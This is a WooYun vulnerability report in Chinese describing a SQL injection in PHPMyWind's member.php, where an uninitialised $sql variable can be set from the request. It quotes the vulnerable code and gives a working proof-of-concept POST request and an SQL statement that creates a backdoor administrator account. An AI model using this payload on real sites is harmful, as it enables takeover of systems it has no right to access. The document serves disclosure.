当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117008

漏洞标题:PHPMyWind一个为所欲为的注入

相关厂商:phpmywind.com

漏洞作者: 路人曱

提交时间:2015-06-01 12:59

修复时间:2015-09-04 13:00

公开时间:2015-09-04 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-01: 细节已通知厂商并且等待厂商处理中
2015-06-06: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-04: 细节向公众公开

简要描述:

rt

详细说明:

PHPMyWind最新版
只需会员登录 即可进行任意sql操作
漏洞代码:
/member.php
861-941行

else if($a == 'perfect')
{
//初始化参数
$username = empty($username) ? '' : $username;
$password = empty($password) ? '' : md5(md5($password));
$repassword = empty($repassword) ? '' : md5(md5($repassword));
$email = empty($email) ? '' : $email;
//验证输入数据
if($username == '' or
$password == '' or
$repassword == '' or
$email == '')
{
header('location:?c=perfect');
exit();
}
if($password != $repassword)
{
header('location:?c=perfect');
exit();
}
$uname_len = strlen($username);
$upwd_len = strlen($_POST['password']);
if($uname_len<6 or $uname_len>16 or $upwd_len<6 or $upwd_len>16)
{
header('location:?c=perfect');
exit();
}
if(preg_match("/[^0-9a-zA-Z_@!\.-]/",$username) or
preg_match("/[^0-9a-zA-Z_-]/",$password) or
!preg_match("/^[\w-]+(\.[\w-]+)*@[\w-]+(\.[\w-]+)+$/", $email))
{
header('location:?c=perfect');
exit();
}
$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `username`='$username'");
if(isset($r['id']))
{
ShowMsg('用户名已存在!','-1');
exit();
}
$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `email`='$email'");
if(isset($r['id']))
{
ShowMsg('您填写的邮箱已被注册!','-1');
exit();
}
//添加用户数据
$regtime = time();
$regip = GetIP();

if(check_app_login('qq'))
{
$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['qq']['uid']."'");
if(isset($r['id']))
ShowMsg('该QQ已与其他账号绑定!','-1');
else
$sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, qqid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['qq']['uid']."')";
}
else if(check_app_login('weibo'))
{
$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['weibo']['idstr']."'");
if(isset($r['id']))
ShowMsg('该微博已与其他账号绑定!','-1');
else
$sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, weiboid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['weibo']['idstr']."')";
}

$dosql->ExecNoneQuery($sql);


主要代码

if(check_app_login('qq'))
{
$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['qq']['uid']."'");
if(isset($r['id']))
ShowMsg('该QQ已与其他账号绑定!','-1');
else
$sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, qqid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['qq']['uid']."')";
}
else if(check_app_login('weibo'))
{
$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['weibo']['idstr']."'");
if(isset($r['id']))
ShowMsg('该微博已与其他账号绑定!','-1');
else
$sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, weiboid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['weibo']['idstr']."')";
}

$dosql->ExecNoneQuery($sql);


$sql 在if else if中才赋值
只需不进入2个条件即可
最后执行 很简单 完全操控所以语句

漏洞证明:

利用起来也很简单
注册个用户登录后发个如下的包即可
POST /phpmywind/member.php?a=perfect
DATA username=123123123x&password=123123123&repassword=123123123&email=12312@qq.com&sql=xxxxx
username email 不是注册过的就行 随便乱填

11.jpg


22.jpg


sql改成 insert into pmw_admin (`username`,`password`) values ((123456),md5(123456))
即可创建一个 123456 密码123456的管理员账户

修复方案:

初始化

版权声明:转载请注明来源 路人曱@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-04 13:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无